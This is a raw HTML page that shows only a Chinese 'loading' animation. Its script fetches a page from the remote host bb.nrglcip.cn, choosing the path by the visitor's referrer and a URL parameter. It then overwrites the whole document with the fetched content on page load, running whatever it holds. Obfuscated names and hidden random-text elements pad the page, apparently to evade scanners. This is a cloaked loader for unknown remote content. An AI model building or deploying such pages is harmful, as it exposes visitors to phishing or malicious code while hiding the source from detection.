<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .giUe7UZl4D {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .giUe7UZl4D .TjdqS4j {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .giUe7UZl4D .content {
            line-height: 50px;
            text-align: center
        }

        .giUe7UZl4D .img {
            width: 100%
        }

        .giUe7UZl4D .SbmdOjjxs {
            text-align: center
        }

        .giUe7UZl4D .SbmdOjjxs span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .giUe7UZl4D .SbmdOjjxs span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .giUe7UZl4D .SbmdOjjxs span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .giUe7UZl4D .SbmdOjjxs span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .giUe7UZl4D .SbmdOjjxs span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .giUe7UZl4D .SbmdOjjxs span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .giUe7UZl4D .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function SuKLvM4Uegj65(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RLdpQHp = SuKLvM4Uegj65('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RLdpQHp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RLdpQHp +".html?a=share";
		}
		
        MgYriQGY=url+"#"+new Date().getTime();
        MgYriQGY && function() {
            $.get(MgYriQGY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<li style='display:none' >XtfaEoAwpxVOXguCh8k0noYtabCabk6pajnHlCGgiewrrjLNXiwAOh8Rm2uiPK28Ijs7Av</li>
<b style='display:none' >vuRkGneJakKAcSWPduV7v0Yu04hlRjgWwKNSbLq06pTGYSjw89Jj04CaXvP</b>
<img  src='' style='display:none'>
<span style='display:none'>moC5KimbTtS5fmocWkGm2JISLKhDPZLa6D6egWIwTPjxvBl3ZsrqRqW0eRZhvY6erHXmyFLB2NnNcd9CTY1YHPtj4VT0MdE</span>
<a  href='#' style='display:none'>DcVP1iOUSPeN18iI0TabH9JiyE</a>
<ul style='display:none' >PWuNWa3ubOo3aXMro1u8rXyCevFsW6GYAgfj5GStI8G6QgZ3nRaR9F3Z11v6BU9hhiNbXNWWadJODw7YjjwWXWXAQXUuyY44Q7nw3</ul><div class="giUe7UZl4D">
    <div class="TjdqS4j">
        <div class="SbmdOjjxs">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>FV2ZToy9fy2zh1dAMXqProQeo3E8ezXxUOBRYlGZgPIrBrwHZTqxjI0o</a>
<span style='display:none'>M3P1zdLNQvOG9EOZwULDWSvzmoZT1XjPZm5Nwrib8a5ety4OHCHWqmTs</span>
<p  style='display:none'>FquEEiQ1rWOWQkhz0RxoRagEV2eoHdtCTRGVh8bcrwWqHGVsDcE9lDQJMdJQOqUkHw9FEDnAX4xo</p>
<li style='display:none' >IBdib1eO1fxKPj5zF3t69qgjS1Ep5PyT9fSSjQhIbwePPycZVf3C5Tma7jm1DBNZZWzsK5R</li>
<img  src='' style='display:none'>
<h1 style='display:none' >qPNHcUMF9nqL3no8cSzFpqH50xNiXYUzNSPMOiVwIa47qdr0mAq6Dq9kXL9PbUZ4sKtChFYLuFOFVu6l8qC81D4</h1>
<a  href='#' style='display:none'>FV2ZToy9fy2zh1dAMXqProQeo3E8ezXxUOBRYlGZgPIrBrwHZTqxjI0o</a>
<a  href='#' style='display:none'>FV2ZToy9fy2zh1dAMXqProQeo3E8ezXxUOBRYlGZgPIrBrwHZTqxjI0o</a></body>
</html>